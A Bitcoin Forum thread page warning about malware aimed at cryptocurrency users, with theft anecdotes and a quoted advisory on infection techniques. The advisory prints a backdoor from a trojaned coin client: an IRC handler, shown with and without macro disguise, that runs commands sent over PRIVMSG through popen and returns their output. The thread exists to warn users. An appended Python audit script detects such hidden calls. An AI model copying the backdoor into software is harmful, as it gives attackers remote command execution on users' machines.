Bitcoin Forum
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 899771 times)
Milla Kross
Member
Activity: 168
Merit: 10
June 21, 2018, 12:41:55 PM
 #701

Yes. Now almost every second is subject to attack by hackers, so you need to be very careful and put in more and more new programs that will secure your data. Good luck, everyone :)
Honourable11
Newbie
Activity: 224
Merit: 0
June 23, 2018, 09:53:53 PM
 #702

I remember back in 2012 when I first heard about mining BTC, there was a thing with viruses on graphics cards which could not be detected by standard antivirus programs.
So I did not start then... the biggest mistake of my life so far...
Rammygold
Newbie
Activity: 202
Merit: 0
June 23, 2018, 11:27:57 PM
 #703

I always use Sandboxie and Shadow Defender before installing or running any new program nowadays... And medium-level hackers fear VirusTotal because they send the file for further analysis (from what I've heard) and their FUD malware loses its FUD ability. So my suggestion will be... Use Sandboxie or any similar software and still use software like Shadow Defender for any kind of new program.
kumablack
Newbie
Activity: 56
Merit: 0
June 24, 2018, 07:32:55 AM
 #704

These malware attacks keep getting more insidious and scary every day... one can't be careful enough online.
santaroom
Newbie
Activity: 35
Merit: 0
June 25, 2018, 12:08:20 PM
 #705

This is so true, there are kinds of malware infections that can infiltrate our computers, let alone our very own wallets. We just need to be more keen when it comes to securing our beloved coins and making sure that they will not just vanish into thin air, the same with the efforts that we have put into our earnings.
CptWhsikeyjack
Member
Activity: 79
Merit: 10
June 25, 2018, 12:47:43 PM
 #706

There is a new type of malware and account stealing for MEW. It's called MEWkit. It steals money from the victim's wallet through a front-end program that mimics MyEtherWallet.

Another one targets airdrops. They basically ask you to fill out a form with all your info and address and then redirect you to another site that is a clone of MEW. You will be requested to sign a message that will in turn steal your keys. This was reported by the official MEW account on Twitter.

bozo1
Newbie
Activity: 62
Merit: 0
June 25, 2018, 03:08:28 PM
 #707

That's why it's good to have more wallets. One for coins that are worthy of you, one for airdrop, ...
wavesroom
Hero Member
Activity: 770
Merit: 500
June 25, 2018, 03:29:01 PM
 #708

A year ago, my email was hacked. After that, the coins were withdrawn from the exchange. It cost about 3,5k$. 2FA has not been installed. Gmail mail return failed. Many contacts are missing.
vuanhquan
Newbie
Activity: 39
Merit: 0
June 26, 2018, 05:28:33 AM
 #709

Everybody, please use Avast antivirus. It will help remove millions of dangerous applications and malware on your computer, which can help to avoid digging underground coin.
adamsrombano
Newbie
Activity: 6
Merit: 0
June 26, 2018, 06:29:00 AM
 #710

Quote from: wavesroom on June 25, 2018, 03:29:01 PM
A year ago, my email was hacked. After that, the coins were withdrawn from the exchange. It cost about 3,5k$. 2FA has not been installed. Gmail mail return failed. Many contacts are missing.

I am deeply saddened to hear that. It was the same with my friends; they share the same reason: a hacker took a lot of their earnings. It was also a large cost and they regret what happened, but it was still a great lesson for them and they learned from what happened. So for you, next time be aware and secure your accounts as much as possible; we put so much effort and time into earning those tokens.
Zakifon
Newbie
Activity: 104
Merit: 0
June 26, 2018, 10:33:14 AM
 #711

I use Avast Premier antivirus - I forgot what viruses, rootkits and other muck are. Very satisfied with this product! I recommend it to everyone! It is especially important to have an antivirus if you use a software purse.
msadikot53
Newbie
Activity: 39
Merit: 0
June 28, 2018, 06:11:50 AM
 #712

Are the malware attempts still going on? What care should be taken as a beginner?
killersyw
Newbie
Activity: 30
Merit: 0
June 28, 2018, 08:22:26 AM
 #713

Thanks for being on top of this and keeping us informed, we do appreciate it!
Dendamma
Newbie
Activity: 7
Merit: 0
June 28, 2018, 12:51:04 PM
 #714

Thank you for sharing tips and information like this. I found this link in this thread https://asktom.cf/index.php?topic=3839038.0 which is also quite useful to me as a new member of this forum.
leialdover
Jr. Member
Activity: 243
Merit: 1
June 29, 2018, 05:53:43 AM
 #715

I've been alarmed by this post. Sometimes it really helps when you read on a forum like this. But my concern is, how can I detect those malware infections if I don't have any experience and knowledge about the code that they're using? Sometimes I just click on links, and I don't know if clicking certain links will cause infections on my device, and I will lose all my data, or there's a possibility that I will be hacked. Online thing is really dangerous.
Anyways, this post is very informative, and keep reminding everyone to be extra careful.

haanhictu
Newbie
Activity: 1560
Merit: 0
June 29, 2018, 10:05:01 AM
 #716

I'm an invalid code and looking out the hole. sad and sorry, but do not know this copy.authenticate does not think to a currency Cry Cry Cry Cry Cry Cry Cry Cry Cry Cry Cry Cry Cry Cry Cry Cry Cry Cry
kinggta10
Jr. Member
Activity: 144
Merit: 2
June 29, 2018, 03:01:12 PM
 #717

This is really rampant nowadays. Offline wallet can still make us secure no matter what
simpelplan
Jr. Member
Activity: 407
Merit: 2
June 29, 2018, 04:24:08 PM
 #718

Quote from: CptWhsikeyjack on June 25, 2018, 12:47:43 PM
There is a new type of malware and account stealing for MEW. It's called MEWkit. It steals money from the victim's wallet through a front-end program that mimics MyEtherWallet.

Another one targets airdrops. They basically ask you to fill out a form with all your info and address and then redirect you to another site that is a clone of MEW. You will be requested to sign a message that will in turn steal your keys. This was reported by the official MEW account on Twitter.

Yes, it is very dangerous, we must be very careful.
I am used to bookmarking important sites to avoid being directed to such things.
I also usually check the site twice before filling in important data.

nwosuchristabe2
Copper Member
Jr. Member
Activity: 686
Merit: 2
June 29, 2018, 04:24:33 PM
 #719

I had a similar issue last year, when I was sent a free trading bot by an online acquaintance whom I met in a Telegram trading group. I left the file to download while I took a nap, only to wake up to the most unfortunate incident: all my trading accounts were wiped. I still cannot fathom how it got access to the trading accounts without 2FA, though my phone was beside my laptop. I regret leaving my accounts open in the browser. My advice is to abstain from downloading free software, or any application you don't understand; it's pretty risky. God help us.
Miha Kot
Newbie
Activity: 56
Merit: 0
June 30, 2018, 11:50:41 AM
 #720

Quote:
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

What security system should be used to avoid falling into the trap of cybercriminals, and how to understand that it is cybercriminals?
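
A source-audit check for the hiding trick shown in the quoted post, where macros disguise a popen call; it is an added example, not part of any post in this thread. The `#define` lines in the sample, the `DANGEROUS` list and the function names are assumptions, and the check generalizes to chained aliases and other process-spawning calls.

```python
import re

# Calls that spawn a shell or process; a coin client's network parser has no reason to reach them.
DANGEROUS = {"popen", "_popen", "system", "execl", "execlp", "execv", "execvp", "execve",
             "CreateProcessA", "CreateProcessW", "ShellExecuteA", "ShellExecuteW", "WinExec"}
DEFINE = re.compile(r'^\s*#\s*define\s+(\w+)\s+(\w+)\s*$')   # object-like macro: NAME -> IDENT
IDENT = re.compile(r'\b[A-Za-z_]\w*')
STRING = re.compile(r'"(?:\\.|[^"\\])*"')

def build_aliases(sources):
    """Map each object-like macro to the identifier it finally expands to."""
    direct = {}
    for text in sources.values():
        for line in text.splitlines():
            m = DEFINE.match(line)
            if m:
                direct[m.group(1)] = m.group(2)
    resolved = {}
    for name in direct:
        target, seen = name, set()
        while target in direct and target not in seen:  # follow chains, stop on cycles
            seen.add(target)
            target = direct[target]
        resolved[name] = target
    return resolved

def audit(sources):
    """Return (file, line, token, resolved_call) for every process-execution call site."""
    aliases = build_aliases(sources)
    findings = []
    for path, text in sources.items():
        for no, line in enumerate(text.splitlines(), 1):
            code = STRING.sub('""', line).split("//")[0]  # ignore literals and // comments
            for tok in sorted(set(IDENT.findall(code))):
                real = aliases.get(tok, tok)
                if real in DANGEROUS and re.search(r'\b%s\s*\(' % re.escape(tok), code):
                    findings.append((path, no, tok, real))
    return findings

# Constructed sample: the #define lines are assumed; the call line is the one quoted in the post
# (the if condition is shortened).
SAMPLE = {
    "util.h": '#define CLine FILE\n#define CRead popen\n#define CFree pclose\n',
    "irc.cpp": 'if (vWords[1] == CBuff && vWords[3] == ":!")\n'
               '    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");\n'
               '// popen("x") in a comment is not a call site\n',
}

if __name__ == "__main__":
    for path, no, tok, real in audit(SAMPLE):
        print(f"{path}:{no}: {tok}() resolves to {real}()")
```

A hit only marks a call site to read by hand; the absence of hits does not show that a source tree is clean.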